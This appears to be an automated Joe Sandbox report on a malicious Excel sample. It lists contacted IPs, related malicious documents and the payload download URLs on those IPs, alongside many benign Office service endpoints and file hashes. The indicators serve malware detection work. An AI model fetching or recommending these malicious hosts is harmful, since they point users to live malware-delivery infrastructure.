                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                      high
                                                                                      https://management.azure.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmediaC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.netC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policiesC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/importsC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v2C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/macC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.aiC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.comC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devicesC23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.C23362E2-4535-4ED1-AA68-CA8EECC3E528.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  190.14.37.134
                                                                                                                                                  unknownPanama
                                                                                                                                                  52469OffshoreRacksSAPAfalse
                                                                                                                                                  51.89.115.124
                                                                                                                                                  unknownFrance
                                                                                                                                                  16276OVHFRfalse
                                                                                                                                                  37.1.196.25
                                                                                                                                                  unknownUkraine
                                                                                                                                                  28753LEASEWEB-DE-FRA-10DEfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:431768
                                                                                                                                                  Start date:09.06.2021
                                                                                                                                                  Start time:09:38:30
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 22s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:banUwVSwBY.xlsx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:17
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal68.expl.evad.winXLSX@7/10@0/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.43.139.144, 92.122.145.220, 52.147.198.201, 168.61.161.212, 40.88.32.150, 52.255.188.83, 104.42.151.234, 52.109.32.63, 52.109.12.21, 52.109.76.36, 20.82.210.154, 8.241.79.254, 8.241.90.254, 8.241.78.254, 8.241.78.126, 8.241.89.254, 92.122.213.247, 92.122.213.194, 20.82.209.183, 20.54.26.129
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  190.14.37.134banUwVSwBY.xlsxGet hashmaliciousBrowse
                                                                                                                                                    51.89.115.124banUwVSwBY.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 51.89.115.124/44356.3971392361.dat
                                                                                                                                                    9830484334-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 51.89.115.124/44313,6048108796.dat
                                                                                                                                                    9830484334-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 51.89.115.124/44313,6048108796.dat
                                                                                                                                                    9830484334-04292021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 51.89.115.124/44313,6048108796.dat
                                                                                                                                                    24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 51.89.115.124/44313,6048108796.dat
                                                                                                                                                    24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 51.89.115.124/44313,6048108796.dat
                                                                                                                                                    24e5ce5d_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 51.89.115.124/44313,6048108796.dat
                                                                                                                                                    37.1.196.25banUwVSwBY.xlsxGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      OVHFRbanUwVSwBY.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 51.89.115.124
                                                                                                                                                      Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 51.89.115.125
                                                                                                                                                      Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 51.89.115.125
                                                                                                                                                      Tax Folder.docGet hashmaliciousBrowse
                                                                                                                                                      • 145.239.131.51
                                                                                                                                                      WlMsy0a1CN.exeGet hashmaliciousBrowse
                                                                                                                                                      • 79.137.109.121
                                                                                                                                                      #Ud83d#Udda8rocket.com 1208421(69-queue-2615.htmGet hashmaliciousBrowse
                                                                                                                                                      • 145.239.131.51
                                                                                                                                                      E91sLsvV8S.exeGet hashmaliciousBrowse
                                                                                                                                                      • 144.217.14.109
                                                                                                                                                      f.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.77.82.110
                                                                                                                                                      50681.dllGet hashmaliciousBrowse
                                                                                                                                                      • 51.77.82.110
                                                                                                                                                      50681.dllGet hashmaliciousBrowse
                                                                                                                                                      • 51.77.82.110
                                                                                                                                                      SecuriteInfo.com.VB.Trojan.Valyria.4710.541.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.77.82.110
                                                                                                                                                      fodeb.exeGet hashmaliciousBrowse
                                                                                                                                                      • 51.222.195.7
                                                                                                                                                      ayowa.exeGet hashmaliciousBrowse
                                                                                                                                                      • 51.222.195.7
                                                                                                                                                      Payment slip.exeGet hashmaliciousBrowse
                                                                                                                                                      • 213.186.33.5
                                                                                                                                                      03062021.exeGet hashmaliciousBrowse
                                                                                                                                                      • 51.195.43.214
                                                                                                                                                      A4C57DF59F0C85EEBCB7B40263D8C3DE037F41B7D2D43.exeGet hashmaliciousBrowse
                                                                                                                                                      • 46.105.204.2
                                                                                                                                                      ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                      • 54.38.220.85
                                                                                                                                                      ConsoleApp1.exeGet hashmaliciousBrowse
                                                                                                                                                      • 51.222.195.7
                                                                                                                                                      http___pbfoa.org_d.exeGet hashmaliciousBrowse
                                                                                                                                                      • 142.4.200.50
                                                                                                                                                      cryptowall.exeGet hashmaliciousBrowse
                                                                                                                                                      • 188.165.164.184
                                                                                                                                                      LEASEWEB-DE-FRA-10DEbanUwVSwBY.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 37.1.196.25
                                                                                                                                                      s1um6myHDC.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.17.121.245
                                                                                                                                                      SecuriteInfo.com.Trojan.Win32.Save.a.6900.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.93.6.203
                                                                                                                                                      BaU9m8mMFx.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.93.5.54
                                                                                                                                                      yl77tM4JDg.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.93.5.54
                                                                                                                                                      DHL4198278Err-PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 5.61.47.127
                                                                                                                                                      PZ33n8HQNu.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.93.6.203
                                                                                                                                                      docs.docxGet hashmaliciousBrowse
                                                                                                                                                      • 178.162.197.236
                                                                                                                                                      docs.docxGet hashmaliciousBrowse
                                                                                                                                                      • 178.162.197.236
                                                                                                                                                      s.wbkGet hashmaliciousBrowse
                                                                                                                                                      • 178.162.197.236
                                                                                                                                                      hYIe5B4Xsz.exeGet hashmaliciousBrowse
                                                                                                                                                      • 5.61.42.216
                                                                                                                                                      DriverPack-17-Online.exeGet hashmaliciousBrowse
                                                                                                                                                      • 178.162.204.5
                                                                                                                                                      551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 46.165.221.217
                                                                                                                                                      scan of document 5336227.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 78.159.101.129
                                                                                                                                                      scan of invoice 91510.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 78.159.101.129
                                                                                                                                                      generated payment 330070.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 78.159.101.129
                                                                                                                                                      BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                                                                                                                                      • 5.61.47.127
                                                                                                                                                      namespaceFuncVar.dllGet hashmaliciousBrowse
                                                                                                                                                      • 185.49.68.134
                                                                                                                                                      lnho0DaeAk.exeGet hashmaliciousBrowse
                                                                                                                                                      • 195.54.33.200
                                                                                                                                                      WevBjZLm07.exeGet hashmaliciousBrowse
                                                                                                                                                      • 195.54.33.200
                                                                                                                                                      OffshoreRacksSAPAbanUwVSwBY.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.134
                                                                                                                                                      Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.102
                                                                                                                                                      Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.102
                                                                                                                                                      DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.121
                                                                                                                                                      DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.121
                                                                                                                                                      Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.102
                                                                                                                                                      Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.102
                                                                                                                                                      Overdue_Debt_829721407_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_829721407_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_1885747285_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_1885747285_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_169149390_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_1049025139_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_809069792_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_169149390_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_1183261722_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_1049025139_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_809069792_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_1183261722_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113
                                                                                                                                                      Overdue_Debt_1807759904_06012021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 190.14.37.113

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\C23362E2-4535-4ED1-AA68-CA8EECC3E528
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):134915
                                                                                                                                                      Entropy (8bit):5.369305056624922
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:fcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:rEQ9DQW+zAXOe
                                                                                                                                                      MD5:E3DC881C528E903DA13103CE5FB84A30
                                                                                                                                                      SHA1:85014026C8433E36ED7159AFD6F62265CFD96182
                                                                                                                                                      SHA-256:5A81521936A7E3D7791714D7833F42F5C9F26D5986FAC69BD137208168C6A620
                                                                                                                                                      SHA-512:198DCB143B40EA4E1024D4F2F3114B4BE236226DD22EA0F6EA5BF703163893297015DFF4A89FEA70710E8A1B1A80BD40CF97AC2F890293684242CD757B752CDB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-09T07:39:28">.. Build: 16.0.14207.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E8405D4B.tif
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:TIFF image data, little-endian, direntries=19, height=1600, bps=53710, compression=LZW, PhotometricIntepretation=RGB, width=1600
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):315878
                                                                                                                                                      Entropy (8bit):7.988901270632308
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:hRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN3:hRMmEv2Bc/nvm8IKABfsYOmauFD
                                                                                                                                                      MD5:BB737290D394078D8A16D5509C5BC970
                                                                                                                                                      SHA1:C8A63B0AB1EB7745A0027E0A17A6CB4C6F79487E
                                                                                                                                                      SHA-256:E11121ECA3FAD55F66EA240EADD4F5B4C978828C94C34736F7673540529B17A5
                                                                                                                                                      SHA-512:3D8A6025171D283FA08D8A5BA4EAAD1EABAD55D7D34629F17F4C6601DD4438FB536B29D7B8CA71E540EDB782433118628EBD3A56CE8FFA453C6A45792425CB9A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: II*..................h\*.......t2#...1..Z)....).~9&.H.r.,.C+.I....e-.M.Si..}0.K.SJ...3.Ng.ZL..G.S..:m..N.Tk5..Z.Z...+.~.f.X.v.-..k.Y.....m.].Wk...p.[.WL...s.^o.\M....c..<n/!..ds9..[)...-..9..h.z...C..i....e..m.[m..}..k.[N.....nw.^N....s..>o/.r.....C4U.kw{......f..~.W....y........y...'...;.R..<.[..;....o...T.....+......?p....N.....#........ht'...Q..E....CQ.^.\m.E......o.Ba[.#Dp...>.<c .1$.*.Q.E....Ir..+.....Y.(H..*K..{..Q...I.....R.Y(Fr|m<$.l...RL.&.3..GP0..D....=.s.5CT,.FN.==7Sq...Iu.3JQ.%GUKS..X...5V.Hu.Z..9T..O4...KC.5.N.Q..aD...g.V.Mh.m.c.M.eMSe.?V..UoR...j....<]...G.v.B$v\Iv[.].f...N\...y_...M....p`w..b.6%.a......T3.c..S.WQ...S......tHk[7.[4;..k.#....~e...f.m.&...-.iz6....V5.jzN...:.3.k.......M..[......m[N...~.nz~.o...k....;.........y..{`.......u..|?-.q.f...|...m6...b..#..]'5..<...g.7_........q.u..].....$[.....~...+..I.p.zt.Y.N.}.............FS5.....k..H...#....~.w.....:...?........"..... 4..PB.A....l...j...... .p..BX1..D..0..Bx
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\DEC40000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):340177
                                                                                                                                                      Entropy (8bit):7.979714001757693
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:8RMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNz+X:8RMmEv2Bc/nvm8IKABfsYOmauFQ
                                                                                                                                                      MD5:95D8041793D3A8BAFC1D09BFDF937DB9
                                                                                                                                                      SHA1:FD78D8904235BFDECEFBACF20EDE516C18031CBE
                                                                                                                                                      SHA-256:DB94E99D84C182729D75A5F648320A42B4714070EF1B9A0B5EC7CFFC33073AE1
                                                                                                                                                      SHA-512:C62FE0DAD0E13770CCDC6BC19ACFAE9E79148CBD909E736DA66AF2D85185403E33159D2AF21066868518526F202875B63AA7E419A665B3389FB5B0D6F272CD57
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ...n.0.E.......D;M...E....I?.&G.a..a...3.......md...sgh.gt5..x.......+.I...........S.x.5[........E.,(.a...w.Q.`.V>....G+.}.S....)....K...T.....h.I...N&..z.......h)...ON....i....%..C....H.T!j".{H..C.72#.<........:.'J}.!.l.j{\..8ms5i.._t.Q+(.DL?..r...>.&....\M.%.%..+Ye.........&...E".>.. ....>..I'..G.{e....lf......?..c.}:.s...~q_..].../._.~q.A/..[...$..IM=?Oo.....ia..W/E..[.A.'....n.o.=>T...._..^.....M)w...A(.....:rt.H.b..;6].k"MQ'.7.1M.....X8~.......PK..........!.........W.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Wed Jun 9 06:39:35 2021, atime=Wed Jun 9 06:39:35 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.661580323623071
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8LXEN3cXUY+duCH2KOwOR4zTiU+WrjAZ/DYbDxLSeuSeL44t2Y+xIBjKZm:8jt2iwbi2AZbcDxh7aB6m
                                                                                                                                                      MD5:8A5011D3A881AE8C57A042AFE2C69637
                                                                                                                                                      SHA1:5008E172021033F2307B08CD31634CA9F672655C
                                                                                                                                                      SHA-256:CA7C7211767AF317D9836241D8B894DF4E28036AC75908FA2DD3C24A17AC6D17
                                                                                                                                                      SHA-512:D88F287FB1EB3A62672C4CA1F73D34EB76EA6BB7F511EE91A43C0D585A118859856B0591D16843CEAB66C2543ED798E378A0B3F17DEE6D7FD6AD3794BB3AA5A7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
